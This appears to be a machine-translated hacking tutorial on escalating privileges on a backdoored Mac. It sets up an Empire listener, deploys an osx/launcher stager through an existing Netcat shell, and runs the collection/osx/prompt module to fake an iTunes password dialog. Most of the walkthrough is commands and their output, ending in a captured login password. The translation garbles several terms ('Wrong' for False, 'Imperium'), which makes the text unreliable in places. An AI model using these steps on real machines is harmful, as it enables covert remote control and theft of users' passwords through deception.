Finding and misusing unsafe permissions files is a simple and surefire way to increase shell privileges on a backdoored Mac OS device. This time, we'll be more aggressive in trying to phish a user's logon password by asking a convincing pop-up message only the destination for their password.
This privilege escalation method consists of the attacker invoking a prompt that instructs the target user to enter their password in a convincing pop-up window. The module Empire prompt allows us to spoof which application requests the login password of the user. So we can make iTunes, the App Store or an installed app to request a password for a credible social engineering attack.
As we can see when using the whoami command, the established Netcat backdoor is not root but instead a normal user (tokyoneon).
bash-3.2 $ whoami tokyoneon
The first thing we want to do is turn our primitive Netcat backdoor into a full-featured Empire backdoor. This article assumes that readers have experience with Empire. Beginners should refer to zero bytes of Getting Started and Storing Guides before proceeding.
: Start an Empire Listener
Start Empire with a Listener waiting for incoming connections from the destination MacBook. In this example, I'm using an HTTP listener on port 8080. The following commands can be used to quickly set up an Empire listener:
(Empire)> listeners [!] Currently no listeners are active (Empire: listener)> uselistener http (Empire: Listeners / http)> set port 8080 (Empire: Listener / http)> Set host xx.xx.xx.xx (Empire: Listener / http)> execute [*] Starting Listener "http" * Serving Flask App "http" (lazy loading) * Environment: Production WARNING: Do not use the development server in a production environment. Use a WSGI production server instead. * Debug mode: off [+] Listener successfully started! (Empire: Listener / http)> Listener [*] Active listeners: Host delay / jitter of the name module ---- ------ ---- ----------- http http http: //xx.xx.xx.xx: 8080 5 / 0,0 (Empire: Listeners)> _
The "host" address can be the local network IP address or VPS address for remote attacks.
Step 2: Create an OSX Stager
Next, create a launcher script with Osx / Launcher Stager. This can be done with the following commands:
usestager osx / launcher Set Listener http generate
The entire launcher output should be copied and pasted into the Netcat terminal. Including the parts "echo" and "python" at the beginning and end of the issue.
A New Agent Will Appear in the Empire Terminal We Will Explode the MacBook
(Empire: agents)> [*] Send PYTHON-Stage (Level 1) to xx.xx.xx.xx [*] Agent P98MAEE0 from xx.xx.xx.xx has posted a valid Python PUB key [*] The new agent P98MAEE0 has checked in [+] Initial agent P98MAEE0 of xx.xx.xx.xx is now active (Slack) [*] Send agent (level 2) to P98MAEE0 at xx.xx.xx.xx [>] ................... (Imperium: Agents)> _
Use the command interact to issue commands to the compromised macOS device.
(Empire: stager / osx / launcher)> interact with P98MAEE0 (Empire: P98MAEE0)>
Activate the module collection / osx / prompt with the command usemodule . Then use the command info to display the available options of the modules
(Empire: P98MAEE0)> usemodule collection / osx / prompt (Empire: Python / Collection / Osx / Command Prompt)> About Name: prompt Module: Python / Collection / OSX / Command Prompt NeedsAdmin: Wrong OpsecSafe: Wrong Language: Python MinLanguageVersion: 2.6 Background: Wrong OutputExtension: None authors: @ FuzzyNop @ harmj0y Description: Starts a specified application with a prompt for Credentials with osascript. Remarks: https://github.com/fuzzynop/FiveOnceInYourLife options: Name Required value Description ---- -------- ------- ----------- ListApps Wrong switch. List applications for Start. SandboxMode Wrong switch. Start a sandbox-safe command prompt Agent True P98MAEE0 Agent on which to run the module. AppName True Google Chrome The name of the application to launch. (Empire: python / collection / osx / prompt)>
The ListApps option returns a list of applications installed on the macOS device. Set the value to true and execute the module
(Empire: python / collection / osx / prompt)> set ListApps true (Empire: Python / Collection / Osx / Command Prompt)> [>] module is not opsec safe, run? [y/N] y [*] TASK_CMD_WAIT was executed with P98MAEE0 [*] Agent P98MAEE0 has been tasked with task ID 1 [*] Agent p98MAEE0 ran the python / collection / osx / prompt module (Empire: python / collection / osx / prompt)> [*] Agent P98MAEE0 returned results. Available applications:  DVD player  Siri  QuickTime player  Chess  Photo Booth  Notes  Image Capture  iBooks  Google Chrome  Preview  Dashboard  TextEdit  Post  Safari  Dictionary  Contacts  Time machine  Utilities  Fontbook  FaceTime  Cards  Mission Control  Stickies  Photos  News  Calculator  iTunes  Firefox  Launchpad  Memories  App Store  Automator  Calendar  System Settings
Before you select an application, the ListApps value is disabled so that the module does not continuously return the list of applications.
(Empire: python / collection / osx / prompt)> unset ListApps
By default, there are many suitable applications for this attack.
To select an application, set the value "AppName" for the application name. In my example, I am using iTunes. Punctuation is important here. Note the capital letter "T" in iTunes. The AppName value must be the same as in the list of apps above.
(Empire: python / collection / osx / prompt)> Set AppName to iTunes (Empire: Python / Collection / Osx / Command Prompt)> [>] module is not opsec safe, run? [y/N] y [*] TASK_CMD_WAIT was executed with P98MAEE0 [*] Agent P98MAEE0 has been assigned task ID 2 [*] Task Agent Agent P98MAEE0 to run module python / collection / osx / prompt
After a few seconds, the target user is prompted with a password request from the application of your choice.
After sending the password, the Empire Terminal displays the following results:
(Empire: python / collection / osx / prompt)> [*] Agent P98MAEE0 returned results. Button returned: OK, text returned: super-secret-password-54321
If the target user fires while searching iTunes media or is heavily engaged in work, they do not hesitate to enter their password to make that annoying call to remove
Backdoor Attack Defense
Defense against such attacks is difficult. Antivirus software can usually be bypassed with a few simple tricks, so it's not a very reliable defense solution. If you receive random password prompts or your MacBook fans heat up unexpectedly, it may indicate that your Mac OS device has been compromised. In my next article, I'll talk about a few strategies to identify backdoors on your MacOS devices … so stay tuned.
Do Not Miss: How to Break into a FileVault Encrypted MacBook